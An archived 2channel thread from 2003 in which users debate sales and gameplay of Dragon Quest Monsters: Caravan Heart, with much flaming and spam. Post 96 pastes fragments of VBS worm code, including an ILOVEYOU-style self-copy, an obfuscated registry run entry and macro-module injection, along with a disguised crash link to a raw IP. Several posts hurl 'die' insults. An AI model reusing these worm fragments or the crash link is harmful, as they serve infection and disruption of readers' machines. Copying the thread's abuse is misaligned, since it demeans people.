2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

DQMキャラバンハートは200万本売れるッ!!!

1 :名無しさん、君に決めた!:03/03/12 12:48 ID:Ib/1LZHT
と予想したい。
うん。

2 :名無しさん、君に決めた!:03/03/12 12:48 ID:???
無理



3 :名無しさん、君に決めた!:03/03/12 12:48 ID:???
よかた

4 :マララー(:.・:ω:.・.:) ◆uAUwMARaRA :03/03/12 12:50 ID:???
無理。

5 :名無しさん、君に決めた!:03/03/12 12:51 ID:???
不可

6 :名無しさん、君に決めた!:03/03/12 12:52 ID:Ib/1LZHT
じゃあ、みんなは何本だと思うの?

7 :名無しさん、君に決めた!:03/03/12 12:53 ID:???
ラウンジやダウソ板にROMがゴロゴロ出回るから無理

8 :名無しさん、君に決めた!:03/03/12 12:55 ID:???
50本売れりゃあ上出来。

9 :名無しさん、君に決めた!:03/03/12 12:56 ID:Ib/1LZHT
>>7
取り締まれないの?
そんなのほっといたらゲーム業界ヤバクナイ?

10 :名無しさん、君に決めた!:03/03/12 12:57 ID:???
いまさら

11 :名無しさん、君に決めた!:03/03/12 12:57 ID:Ib/1LZHT
>>8
100万は行くでしょ。
最低。

12 :名無しさん、君に決めた!:03/03/12 12:58 ID:???
>>11
100万もいかない。

13 :名無しさん、君に決めた!:03/03/12 12:58 ID:Ib/1LZHT
>>12
どして?

14 :名無しさん、君に決めた!:03/03/12 12:59 ID:???
>>13
どら食えがそんな売れるはずねーだろ

15 :名無しさん、君に決めた!:03/03/12 13:01 ID:???
全角のアルファベットって間抜けな感じがするな。DQM

16 :名無しさん、君に決めた!:03/03/12 13:01 ID:Ib/1LZHT
>>14
DQだからこそ売れるんじゃないの?
DQM1は230万、2は180万売れたんだから。

17 :名無しさん、君に決めた!:03/03/12 13:03 ID:???
>>16
とりあえず漏れが買わない

18 :名無しさん、君に決めた!:03/03/12 13:12 ID:Q38MUjKx
漏れは買いますが何か?

19 :名無しさん、君に決めた!:03/03/12 13:21 ID:???
漏れも買いますが何か。。

20 :名無しさん、君に決めた!:03/03/12 13:21 ID:???
>>14
FF信者の方ですか?w

21 :名無しさん、君に決めた!:03/03/12 13:53 ID:???
>>20
DQ信者の方ですか?w

22 :名無しさん、君に決めた!:03/03/12 13:55 ID:E6vDXcP/
ROMは痛いけど、それでも100万本は売れそう。
とりあえず漏れも買い。

23 :名無しさん、君に決めた!:03/03/12 13:57 ID:???
アドバンス版というよりGBカラー版のような気がする・・・・
でも買う

24 :名無しさん、君に決めた!:03/03/12 14:03 ID:???
100万本は厳しい。
70万行けば上出来じゃないの?

25 :名無しさん、君に決めた!:03/03/12 14:11 ID:7UNJr9U5
ミリオンは行くんでねえの
今回、一バージョンだし

26 :名無しさん、君に決めた!:03/03/12 14:16 ID:???
&rlo;
&rlo;
&rlo;
&rlo;
&rlo;

27 :名無しさん、君に決めた!:03/03/12 14:50 ID:aEyIO8EH
>>25
確かに。
アレフガルドが舞台というのもあるし。

28 :名無しさん、君に決めた!:03/03/12 14:52 ID:???
つーかスレタイDQNキャラバンハートかと思った。

29 :名無しさん、君に決めた!:03/03/12 15:01 ID:???
>>23
なんで?
明らかにGBAのソフトじゃん。

30 :名無しさん、君に決めた!:03/03/12 15:52 ID:???
テレビCMやってたっけ?
知らない人が多いと思う。

31 :お店のバイト:03/03/12 15:54 ID:vfBc6S70
そのうちキャラバンハートSPとかって出そうだな

最近ポケモンの真似して〜ver 〜verって
出てるけど、ユーザーへの嫌がらせみたいで寒い時代になったな

32 :名無しさん、君に決めた!:03/03/12 15:58 ID:???
キャラバンハートは複数のバージョンがないみたい。
いずれ出るかも知んないけど。。

33 :名無しさん、君に決めた!:03/03/12 16:01 ID:???
モンスターズ2でも思ったんだけど、
ね だ ん た け ぇ よ !!

34 :名無しさん、君に決めた!:03/03/12 16:11 ID:???
随分マンドクセエシステムだな
人間の仲間って必要なのか?

35 :名無しさん、君に決めた!:03/03/12 16:30 ID:4wlyp+p8
モンスターが減ったのと、
戦闘でキャラが動かないのが気に入らない。

36 :名無しさん、君に決めた!:03/03/12 16:38 ID:???
モンスター育成なんて面倒なことしたくない。
こんなのより新作のロトシリーズ作ってよ。
キャラバンハートは舞台がアレフガルドだから
その辺を期待して買う人が多そうだけど、
しょせんはドラクエモンスターズ。つまらないよ。

37 :名無しさん、君に決めた!:03/03/12 16:52 ID:???
最初のDQMはすごいクソゲーだと思った あれはやばかった
育成に楽しみ出せないとだめなのか

38 :名無しさん、君に決めた!:03/03/12 16:56 ID:5k+Y0VN+
普通のDQを期待して買うと死ぬるぞ

39 :名無しさん、君に決めた!:03/03/12 16:57 ID:HFbkbyge
笑う→藁→ワラ→ワーラー→water→水

これからは(水


これをひたすら流行らせてください。


40 :名無しさん、君に決めた!:03/03/12 17:00 ID:???
DQMは育成が楽しい
本編のDQとは違った面白さがある。

41 :名無しさん、君に決めた!:03/03/12 17:00 ID:???
>>39
ラウンジかニュー即にでもいって来い

42 :名無しさん、君に決めた!:03/03/12 17:15 ID:???
DQMシリーズは正直つまらない。ポケモンの方が1000倍楽しいよ。
DQMのモンスターはキモイ+どんな技でも覚えられる(←これが駄目
弱いモンスターと強いモンスターの差がありすぎる。
それに画像も汚い。正直、名前だけで売れてるゲームだろ?

43 :名無しさん、君に決めた!:03/03/12 17:16 ID:???



















44 :名無しさん、君に決めた!:03/03/12 17:17 ID:???
水→water→ワーラー→ワラ→藁→笑う

これからは(笑う


逆行してひたすら流行らせてください。

45 :名無しさん、君に決めた!:03/03/12 17:19 ID:???
>>44
流行る訳ねぇよタコ

46 :名無しさん、君に決めた!:03/03/12 17:21 ID:???
回りの空気が読めない生の春厨の>>44がいるスレはここですか?

47 :名無しさん、君に決めた!:03/03/12 17:23 ID:???
>>46
生の春厨ってなんだよw おまえも氏ね

48 :名無しさん、君に決めた!:03/03/12 17:25 ID:???
>>47
そんくらいで怒るな腐れ

49 :名無しさん、君に決めた!:03/03/12 17:28 ID:???
>>48
おまえ臭いから反応すんな

50 :名無しさん、君に決めた!:03/03/12 17:30 ID:???
>>49
おまえ臭いから反応すんな

51 :名無しさん、君に決めた!:03/03/12 17:31 ID:???
>>50
アホの典型、オウム返し( ´,_ゝ`)プッ

52 :名無しさん、君に決めた!:03/03/12 17:31 ID:???
>>51
アホの典型、オウム返し( ´,_ゝ`)プッ


53 :名無しさん、君に決めた!:03/03/12 17:33 ID:???
>>52
アホの典型、オウム返し( ´,_ゝ`)プッ


54 :名無しさん、君に決めた!:03/03/12 17:34 ID:???
即レス必死だな(ゲラ

55 :名無しさん、君に決めた!:03/03/12 17:34 ID:???
即レス必死だな(ゲラ

56 :名無しさん、君に決めた!:03/03/12 17:35 ID:???
なんか知らんが放置しろよ

反応してもしょうがないだろ

57 :名無しさん、君に決めた!:03/03/12 17:38 ID:???
リロードしまくってるんだなw 負荷が高くなって迷惑だから氏ねよ

58 :名無しさん、君に決めた!:03/03/12 17:42 ID:???
>>57
その高い負荷の中書き込むお前も同罪


オレモナー

59 :名無しさん、君に決めた!:03/03/12 18:52 ID:???
>>42
漏れはどっちも同じくらいハマりましたが何か。

60 :名無しさん、君に決めた!:03/03/12 20:21 ID:???
確かにドラクエは面白い。
だが、今回は食料システム(?)のせいで
プレイヤーの自由にフィールドで活動できない。
毒の沼等のダメージ地帯などにはいると、
かなり食料が減るなどと腹がたつことになる。
まぁ、好んで毒沼に飛び込む馬鹿者は居ないと思うが。

あと、今回人間キャラの存在意義がわからない。
戦闘がややこしくなるのでハッキリ言って邪魔。
モンスター同士がぶつかり合うシンプルなルールの方が良い。
武器防具が街に売っているわけでもなさそうだし、
第一現時点で街の写真が一枚も出ていない。

61 :名無しさん、君に決めた!:03/03/12 20:22 ID:???
>>60の続き

モンスターを配合させ、対戦をするのが
DQモンスターズの特徴でもあり、また楽しさでもあった。
究極のモンスターを造ってやろうと皆必死で進めていたあの頃が懐かしい。
しかし今回はモンスターを転身させるなどと必要ないシステムが導入される。
モンスターズは「配合」がウリではなかったのか・・・。
対戦要素があるかどうかもわからない。(あるとは思うが)

アドバンスによって描かれるグラフィックは美しい。
だが見かけだけがゲームの面白さを左右するものなのか。
だが、本来の良さを失ったものになんの価値があろうか。

昔からのDQファンはこの伝説の大陸の姿を懐かしみ、
そして期待を膨らませることであろう。

だが所詮は伝説。
キーファ王子ひきいるキャラバンが、
ロトの勇者の血を引く選ばれし3人の冒険に勝てるであろうか。
伝説を維持し続けるか傷を付けるか。
伝説を超えると思う者のみが買えばよい。


・・・えーと、俺は買わないッス。


62 :名無しさん、君に決めた!:03/03/12 21:24 ID:???
転身って、要は配合と対して変わんないだろ、基本的には。

63 :名無しさん、君に決めた!:03/03/12 21:26 ID:???
>>62
放置も出来ない厨房ハケーン

64 :名無しさん、君に決めた!:03/03/12 21:41 ID:???
なんでも放置すりゃいいってもんじゃないだろ。
2ちゃんに慣れてきて調子に乗ってる厨房か?

65 :名無しさん、君に決めた!:03/03/12 21:48 ID:KOeVGQht
発売日はいつ?

66 :名無しさん、君に決めた!:03/03/12 21:49 ID:???
3月29日

67 :名無しさん、君に決めた!:03/03/12 21:51 ID:???
>>64
煽りや荒らしは*完全無視*してください。
出来ない人は来ないで下さい。
by管理人

68 :名無しさん、君に決めた!:03/03/12 21:51 ID:???
発売日はもうすぐ!!!!!!

69 :名無しさん、君に決めた!:03/03/12 21:51 ID:KOeVGQht
Think You

70 :名無しさん、君に決めた!:03/03/12 21:52 ID:???
厨房ども必死だなw

71 :名無しさん、君に決めた!:03/03/12 21:53 ID:???
>>69
thank youも書けない厨房ハケーン

72 :名無しさん、君に決めた!:03/03/12 21:54 ID:???
Think you
って言葉もあるぞ。






多分・・・・。

73 :名無しさん、君に決めた!:03/03/12 21:56 ID:???
think(思う)
>>72
2年になれない厨房ハケーン

74 :名無しさん、君に決めた!:03/03/12 21:56 ID:KOeVGQht
英語苦手で・・・w
で、糞ゲーなの?コレ

75 :名無しさん、君に決めた!:03/03/12 21:57 ID:???
君を思え
って意味だろ。

ここで使うのは多分間違ってると思うが
あえて使っている可能性もある。

76 :名無しさん、君に決めた!:03/03/12 21:59 ID:???
>>74
糞ゲーかどうかは、やってみるまで判んないでしょ。
漏れは単純にこのシリーズにハマってたから期待してるけど。

77 :名無しさん、君に決めた!:03/03/12 22:00 ID:???
最近どの板にも厨房って言葉を覚えて使いたがる奴がワラワラ沸いてきたな

とりあえずお前らドラクエ板逝け

78 :名無しさん、君に決めた!:03/03/12 22:02 ID:???
>>77
厨房?工房?

79 :名無しさん、君に決めた!:03/03/12 22:03 ID:???
>>77
彼らは厨房叩いて一体感を得たいだけだからほっといたほうがいい。

80 :名無しさん、君に決めた!:03/03/12 22:03 ID:???
>>78
はあ?

81 :名無しさん、君に決めた!:03/03/12 22:04 ID:???
>>67
俺には、>>60-61は荒らしや煽りには見えないが。
少なくとも、このスレの大半を占めるゴミカキコよりは有用だ。

82 :名無しさん、君に決めた!:03/03/12 22:05 ID:???
長レスは存在自体が厨房

83 :名無しさん、君に決めた!:03/03/12 22:05 ID:???
>>80
煽りや荒らしは*完全無視*して下さい。
出来ない人は来ないで下さい。
by管理人

84 :名無しさん、君に決めた!:03/03/12 22:06 ID:???
>>83
自治厨ウザイ

85 :名無しさん、君に決めた!:03/03/12 22:07 ID:???
>>82
長文も読めない屑

ていうかいちいち

煽りや荒らしは*完全無視*して下さい。
出来ない人は来ないで下さい。
by管理人

とか書く時点で荒らしにかまってんだよ

86 :名無しさん、君に決めた!:03/03/12 22:07 ID:???
>>81
お前のゴミカキコモナー

87 :名無しさん、君に決めた!:03/03/12 22:08 ID:???
盛り上がって来た訳だが・・・

88 :名無しさん、君に決めた!:03/03/12 22:09 ID:???
>>87
チャチャ入れんなアファ

89 :名無しさん、君に決めた!:03/03/12 22:09 ID:???
ふう、一人で3人も演じるのは大変だなあ

90 :名無しさん、君に決めた!:03/03/12 22:11 ID:???
>>89

91 :死ね:03/03/12 22:19 ID:???
ghg;h・;れうえ80うt30位」うgbhjrjhhかrhfbr0jmれ

92 :名無しさん、君に決めた!:03/03/12 22:20 ID:???
sage

93 :死ね:03/03/12 22:22 ID:???
h;お後8ぎぇr:オア枯れhygrg0hgvbん:fb:fdvjdvj:bjvbっふぇふぇ
ドvへwfwftg;あ7ふぇうふぁw8g

94 :名無しさん、君に決めた!:03/03/12 22:24 ID:???
春厨必死だなww

95 :死ね:03/03/12 22:25 ID:???
hjdy。、ldst、xsr5sk、t5ン5st、x5t、xlf;。。い77い;。7.f7

96 :死ね:03/03/12 22:25 ID:???
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
以上、ケン・コロスでした!  
http://news2.2ch.net|test|read.cgi|newsplus%40195.126.71.77/%63%72%61%73%68%6D%65
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?

97 :死ね:03/03/12 22:29 ID:???
じょhの;のl;お;・おh;・おぉのぉんhhん¥


ヒキブタしね

98 :名無しさん、君に決めた!:03/03/12 22:31 ID:???
>>97
100getしたいだけだろお前w

99 :死ね:03/03/12 22:31 ID:???
ヒキブタ死ね

100 :死ね:03/03/12 22:31 ID:???
100

101 :名無しさん、君に決めた!:03/03/12 23:15 ID:???
2ちゃんブラウザー使わないと見れないようにすれば良いのに

頼むよヒロユキ

102 :死ね:03/03/12 23:54 ID:???
>>100
hファ水f具わgふひんvjvぐいぐぇういあふぇうい?

103 :名無しさん、君に決めた!:03/03/12 23:56 ID:???

自作自演乙カレー

104 :名無しさん、君に決めた!:03/03/12 23:59 ID:???
初回60万本予想

105 :名無しさん、君に決めた!:03/03/13 00:14 ID:Pq37vQUJ
2も確か初週50万超えたんだよね。
あの価格にもかかわらず。

106 :注目っ!:03/03/13 00:20 ID:6zh8z1CS
業界‖ 英国週間ランキング、GCハード/ソフト販売数増加
PSO、バイオ0、ソニックメガコレクション等の有力ソフトが集まった3月7日を含む英国の週間ランキングにおいてGCの販売台数が21%増加。
ソフト販売数は45%増加で49,867本、Xboxの46,061本(前週比-7%)という事でソフトにおいてXboxを抜かしたそうです。
今週はモンキーボール2やゴーストリコン等の発売が控えています。対するXboxはLiveがスタートします。

GameCube takes second place, beating software void

107 :名無しさん、君に決めた!:03/03/13 00:23 ID:???
FF・ドラクエの祭りっぷりはスゴイ(FF10-2)
ここはマターリですなヽ(´ー`)ノ


108 :名無しさん、君に決めた!:03/03/13 00:29 ID:???
>>107
どう祭られてるの?
まあ。X-2は評価が低いしどーでいいけど。

109 :注目っ!:03/03/13 01:20 ID:6zh8z1CS
 |  ._,,..-..,,,__          ○     .|
 |  |:::::::: ニ=.T         _______.   .|
 |  |:::::::: ニニ ト、      _,.-个:::::::|   |
 |___ .|:::::::: ニニ |叫     |.=ニレ-'个ー‐-|
 |.  ̄\:. ニニ.|叫 ̄ ̄ ̄~T=ニ|::|`'ー.,_  .|
 |-ー‐''''个.ニニ.レ'´√ ̄ ̄'个-.,|::| 叫 `'ー|
 |. ニ= |::_,.-'´ /   _   ';_ ``|.,     .|
 |   _,.ト'´  /  /入ヽ  `;_  \   |
 |  /    /   ヽ∵フ   `;_  \,  |
 |_/     /  √ |Y| `'i   `;_   \_|
 |      /    | |.|.| .|    `;_    |
  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
           やすっ!

110 :名無しさん、君に決めた!:03/03/13 15:17 ID:hlKgA+FO
>>109
ポートピア!
懐かしい!

111 :名無しさん、君に決めた!:03/03/13 15:24 ID:???
ゆうぼんの処女作だったよね、確か?

112 :名無しさん、君に決めた!:03/03/13 15:26 ID:hlKgA+FO
>>111
アドバンスでリメイクきぼんっ!!!

113 :名無しさん、君に決めた!:03/03/13 15:38 ID:???
法隆寺の処女作はラブマッチテニスだよ。

114 :名無しさん、君に決めた!:03/03/13 15:58 ID:hlKgA+FO
>>113
それもキボン!

115 :名無しさん、君に決めた!:03/03/13 16:24 ID:hlKgA+FO
米国「ゼルダ 風のタクト」、予約だけで56万本

http://forums.gaming-age.com/showthread.php?thread...

 米国でNintendo of Americaから3月24日に発売される、ゲームキューブ用「ゼルダの伝説 風のタクト」の予約が56万本にも達しているという。この数字、米国的にはどうなのかというか、56万本というのは"凄い数字"だそうだ。

 これは米国で爆発的に売れた「Grand Theft Auto: Vice City」の予約数を凌ぐ勢いらしいぞ。米国でも国内同様の予約キャンペーンが行なわれており、それも大きな要因のひとつになっていることは間違いないだろうね。

ゼルダの伝説 風のタクト
http://www.nintendo.co.jp/ngc/gzlj/

116 :名無しさん、君に決めた!:03/03/13 16:55 ID:???
包茎戦士ソーロマン

117 :名無しさん、君に決めた!:03/03/13 17:20 ID:???
アメリカにも中古屋ってあるの?

118 :名無しさん、君に決めた!:03/03/13 17:26 ID:???
漏れは予約してまで買うがそこまではいかんだろ。
キャラが。。。

20 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)